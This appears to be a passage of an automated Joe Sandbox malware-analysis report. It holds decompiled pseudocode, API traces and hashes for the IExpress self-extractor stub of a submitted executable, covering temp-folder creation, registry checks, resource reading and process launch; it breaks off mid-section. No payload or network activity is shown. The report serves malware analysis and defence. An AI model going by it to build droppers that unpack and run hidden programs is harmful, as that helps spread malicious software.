Part of subcall function 009453A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094541F
Part of subcall function 009453A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094542B
Part of subcall function 009453A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945434

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 0094547D, 00945481, 009454AB, 0094551C, 0094553C, 00945568
ppc, xrefs: 009454E9
i386, xrefs: 009454FE
mips, xrefs: 009454F7
alpha, xrefs: 009454F0

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-2738818301
Opcode ID: eeeddecbb6c8b0dfaeb1e8249e684aa58107d88acd934f097c5e691fb3bbbd1b
Instruction ID: ceaa131d5c8f472ed7c03675aab9852cb3646924983a79e4f0b83dd13d846653
Opcode Fuzzy Hash: eeeddecbb6c8b0dfaeb1e8249e684aa58107d88acd934f097c5e691fb3bbbd1b
Instruction Fuzzy Hash: 00313971B14A04ABCB20AFA99C44E7F77AFABC7744B06012AF402D2652DF74CE41C691

Uniqueness

Uniqueness Score: -1.00%

Function 0094256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0094256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E009424E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00942572
0x00942573
0x00942575
0x00942578
0x0094257d
0x00942627
0x00942583
0x00942586
0x00942589
0x009425eb
0x00942607
0x00000000
0x00942609
0x0094261a
0x00000000
0x0094261a
0x00000000
0x0094258b
0x0094258b
0x0094259e
0x009425b2
0x009425ba
0x009425cb
0x009425d1
0x009425d6
0x009425da
0x009425dd
0x009425dd
0x009425e3
0x009425e3
0x009425e3
0x0094258b
0x00942589
0x0094262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00944096,00944096,?,00941ED3,00000001,00000000,?,?,00944137,?), ref: 009425B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00944096,?,00941ED3,00000001,00000000,?,?,00944137,?,00944096), ref: 009425CB
RegCloseKey.KERNELBASE(?,?,00941ED3,00000001,00000000,?,?,00944137,?,00944096), ref: 009425DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00944096,00944096,?,00941ED3,00000001,00000000,?,?,00944137,?), ref: 009425FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00944096,00000000,00000000,00000000,00000000,?,00941ED3,00000001,00000000), ref: 0094261A

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 009425A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 009425F5
PendingFileRenameOperations, xrefs: 009425C3

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: cb5717be402fe4f413a4b4187ea84fd2dc45065eb8d9f1cd986d0536f012bf30
Instruction ID: f2d1cf4b9ceb71878cfc3bc4cc4ec19e341ffc0bdf0770af6e9c684b3edeb7b4
Opcode Fuzzy Hash: cb5717be402fe4f413a4b4187ea84fd2dc45065eb8d9f1cd986d0536f012bf30
Instruction Fuzzy Hash: D3115135966228BB9B30AB91AC09DFFBF7CEF467A5F504056F808E2010DA305E44E6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00946A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00947155();
				_push(0x58);
				_push(0x9472b8);
				E00947208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x9488b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x9488b0; // 0x2
						if(__eflags != 0) {
							 *0x9481e4 = _t58;
							goto L13;
						} else {
							 *0x9488b0 = _t58;
							_t37 = E00946C3F(0x9410b8, 0x9410c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00946FF4();
						L13:
						_t68 =  *0x9488b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x9410b4);
							_push(0x9410ac);
							L00947202();
							 *0x9488b0 = 2;
						}
						if(_t53 == 0) {
							 *0x9488ac = 0;
						}
						_t71 =  *0x9488b4;
						if( *0x9488b4 != 0 && E00947060(_t71, 0x9488b4) != 0) {
							_t60 =  *0x9488b4; // 0x0
							 *0x94a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x777d5b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00942BFB(0x940000, 0, _t59); // executed
							 *0x9481e0 = _t30;
							__eflags =  *0x9481f8;
							if( *0x9481f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x9481e4;
							if( *0x9481e4 == 0) {
								__imp___cexit();
								_t30 =  *0x9481e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0094724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00946a60
0x00946a6a
0x00946a6c
0x00946a71
0x00946a78
0x00946a7f
0x00946a85
0x00946a8e
0x00946a91
0x00946a93
0x00946a9c
0x00946aa2
0x00000000
0x00000000
0x00946aa6
0x00946ab4
0x00000000
0x00946aa8
0x00946aaa
0x00946aab
0x00946aab
0x00946abf
0x00946abf
0x00946ac5
0x00946ad1
0x00946ad7
0x00946b05
0x00000000
0x00946ad9
0x00946ad9
0x00946ae9
0x00946af0
0x00946af2
0x00000000
0x00946af4
0x00946af4
0x00946afb
0x00946afb
0x00946af2
0x00946ac7
0x00946ac7
0x00946ac9
0x00946b0b
0x00946b0b
0x00946b11
0x00946b13
0x00946b18
0x00946b1d
0x00946b24
0x00946b24
0x00946b30
0x00946b39
0x00946b39
0x00946b3b
0x00946b42
0x00946b57
0x00946b5f
0x00946b65
0x00946b65
0x00946b67
0x00946b6c
0x00946b6e
0x00946b71
0x00946b74
0x00946b74
0x00946b79
0x00000000
0x00000000
0x00946b7d
0x00946b81
0x00000000
0x00000000
0x00946b83
0x00946b8c
0x00946b8d
0x00946b90
0x00946b90
0x00946b83
0x00946b81
0x00946b94
0x00946b98
0x00946ba2
0x00946b9a
0x00946b9a
0x00946b9a
0x00946ba3
0x00946bab
0x00946bb0
0x00946bb5
0x00946bbc
0x00946bbf
0x00000000
0x00946bbf
0x00946c1e
0x00946c25
0x00946c27
0x00946c2d
0x00946c2d
0x00946c32
0x00000000
0x00946bc5
0x00946bc5
0x00946bc8
0x00946bcc
0x00946bce
0x00946bce
0x00946bd1
0x00946bd3
0x00946bd3
0x00946bd6
0x00946bda
0x00946be1
0x00946be3
0x00946be5
0x00946be5
0x00946be6
0x00946be6
0x00946be9
0x00946bea
0x00946bea
0x00946b74
0x00946c39
0x00946c3e
0x00946c3e
0x00946abe
0x00946abe
0x00000000

APIs

Part of subcall function 00947155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00947182
Part of subcall function 00947155: GetCurrentProcessId.KERNEL32 ref: 00947191
Part of subcall function 00947155: GetCurrentThreadId.KERNEL32 ref: 0094719A
Part of subcall function 00947155: GetTickCount.KERNEL32 ref: 009471A3
Part of subcall function 00947155: QueryPerformanceCounter.KERNEL32(?), ref: 009471B8

GetStartupInfoW.KERNEL32(?,009472B8,00000058), ref: 00946A7F
Sleep.KERNEL32(000003E8), ref: 00946AB4
_amsg_exit.MSVCRT ref: 00946AC9
_initterm.MSVCRT ref: 00946B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00946B49
exit.KERNELBASE ref: 00946BBF
_ismbblead.MSVCRT ref: 00946BDA

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: c0090fbba3f163abffc660a9234577ab64c19b69f2d641002c9cbbe884d3edc8
Instruction ID: f380fcfd9f3ce58b3a92de3c384a4547f4257eb4c7716938dffa1dfe323b5e69
Opcode Fuzzy Hash: c0090fbba3f163abffc660a9234577ab64c19b69f2d641002c9cbbe884d3edc8
Instruction Fuzzy Hash: 6841E2B495C3249BDB21AF68DC05F6E77E8EB8B725F14411AF951E3290CB744881AB82

Uniqueness

Uniqueness Score: -1.00%

Function 009458C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E009458C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00941680(_t20, _t36, _t33);
					E0094658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x949124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x949124 = E00946285();
					_t14 = 0;
				}
				return _t14;
			}

0x009458cd
0x009458d1
0x009458d3
0x009458d5
0x009458d8
0x009458d8
0x009458da
0x009458db
0x009458e1
0x009458ed
0x009458f1
0x0094591e
0x0094592c
0x00945943
0x0094594a
0x0094594d
0x00945953
0x00945959
0x00000000
0x0094595b
0x0094595c
0x00945963
0x0094596c
0x00000000
0x00945972
0x00945974
0x0094597a
0x0094597a
0x0094596c
0x009458f3
0x00945901
0x00945906
0x0094590b
0x00945910
0x00945910
0x00945918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 009458E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945943
LocalFree.KERNEL32(00000000,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094594D
CloseHandle.KERNEL32(00000000,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0094595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00945534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00945963

Strings

TMP4351$.TMP, xrefs: 00945923
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 009458CD, 009458CF, 00945919, 00945962

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
API String ID: 747627703-2560997688
Opcode ID: 47a75435ed2e88c88386766afca01516bdbca861d0cd33fd1d60b4df5a9ed5c7
Instruction ID: d52baf2f2c0a94df19affcfed7961f919e086007cb2131610cff1e218812984a
Opcode Fuzzy Hash: 47a75435ed2e88c88386766afca01516bdbca861d0cd33fd1d60b4df5a9ed5c7
Instruction Fuzzy Hash: 781134756182106BD7241FB9AC0DF9B7F9DDF8B774B100619F50AE32D2CA708C05C2A0

Uniqueness

Uniqueness Score: -1.00%

Function 00943FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00943FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x948004; // 0xec518a5e
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00946CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x949124 = E00946285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E009444B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x948a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x949a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x949a2c = _t44;
						}
					}
				}
				E0094411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x949a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00943fef
0x00943ffa
0x00944001
0x00944008
0x0094400a
0x0094400b
0x00944010
0x0094410a
0x0094411a
0x0094411a
0x0094401c
0x0094401d
0x0094401e
0x0094401f
0x00944033
0x0094403b
0x009440ca
0x009440e9
0x009440f8
0x00944101
0x00944106
0x00944106
0x00944108
0x00944108
0x00000000
0x00944108
0x00944049
0x0094405c
0x00944062
0x00944068
0x0094406e
0x00944070
0x00944077
0x0094407f
0x00944089
0x0094408b
0x0094408b
0x00944089
0x00944077
0x00944091
0x0094409c
0x009440a8
0x009440b8
0x00000000
0x009440c2
0x00000000
0x009440c2

APIs

CreateProcessA.KERNELBASE ref: 00944033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00944049
GetExitCodeProcess.KERNELBASE ref: 0094405C
CloseHandle.KERNEL32(?), ref: 0094409C
CloseHandle.KERNEL32(?), ref: 009440A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 009440DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 009440E9

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 82e10136b1c309505799f2dc3ac8fa3d7b995869468409e326e8184bdede697e
Instruction ID: c1f552f204d82509febfcdb913eb20a06223f37efc883cfcb95b98911fbc8b95
Opcode Fuzzy Hash: 82e10136b1c309505799f2dc3ac8fa3d7b995869468409e326e8184bdede697e
Instruction Fuzzy Hash: 4431DF39698208ABEB309F65DC49FAB777CEB9A715F1001A9F605E21A1CA304C81DF21

Uniqueness

Uniqueness Score: -1.00%

Function 009451E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E009451E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0094468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0094468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E009444B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x949124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x949124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x949124 = 0x80070714;
					goto L10;
				}
				E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x949124 = E00946285();
				goto L10;
			}

0x009451fb
0x00945207
0x0094520b
0x0094523c
0x00945268
0x00945270
0x0094528b
0x00945293
0x0094529c
0x009452a6
0x009452b0
0x00000000
0x009452b0
0x0094529e
0x00945279
0x00000000
0x0094527b
0x00945273
0x00000000
0x00945273
0x0094524a
0x00945250
0x00945256
0x00000000
0x00945256
0x00945219
0x00945223
0x00000000

APIs

Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00942F4D,?,00000002,00000000), ref: 00945201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00945250

Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554

Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285

Strings

UPROMPT, xrefs: 009451EF, 00945230
<None>, xrefs: 00945262

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 99e039a39f226cfc417e6af5ba935afaee703df040dab9354bf871787a61f18a
Instruction ID: 38d2061d7f3de5a818e4c575835953313910f7dd6a1576c8db3b5e70c7ab2204
Opcode Fuzzy Hash: 99e039a39f226cfc417e6af5ba935afaee703df040dab9354bf871787a61f18a
Instruction Fuzzy Hash: 691127B9259201BFE3246FF15C49F3B62DDDBCA384F11442EF612E6192EABC8C006135

Uniqueness

Uniqueness Score: -1.00%

Function 009452B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E009452B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x948004; // 0xec518a5e
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x9491e0; // 0x3087c30
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x948a24 == 0 &&  *0x949a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x948a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x948a24 == 0 &&  *0x949a30 == 0) {
					_push(_t22);
					E00941781( &_v268, 0x104, _t22, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x949a34 & 0x00000020) != 0) {
						E009465E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00942390( &_v268);
					_t11 =  *0x948a20; // 0x0
				}
				if( *0x949a40 != 1 && _t11 != 0) {
					_t11 = E00941FE1(_t22); // executed
				}
				 *0x948a20 =  *0x948a20 & 0x00000000;
				return E00946CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x009452b6
0x009452b6
0x009452b6
0x009452c1
0x009452c8
0x009452cb
0x009452cc
0x009452d4
0x009452d6
0x009452d7
0x009452de
0x009452e0
0x009452f2
0x009452fa
0x009452fa
0x00945302
0x00945305
0x0094530c
0x00945312
0x00945316
0x00945316
0x00945317
0x0094531c
0x0094531f
0x00945333
0x00945345
0x00945351
0x00945359
0x00945359
0x00945363
0x00945369
0x0094536f
0x00945374
0x00945374
0x00945381
0x00945387
0x00945387
0x0094538f
0x009453a0

APIs

SetFileAttributesA.KERNELBASE(03087C30,00000080,?,00000000), ref: 009452F2
DeleteFileA.KERNELBASE(03087C30), ref: 009452FA
LocalFree.KERNEL32(03087C30,?,00000000), ref: 00945305
LocalFree.KERNEL32(03087C30), ref: 0094530C
SetCurrentDirectoryA.KERNELBASE(009411FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00945363

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00945334

Memory Dump Source

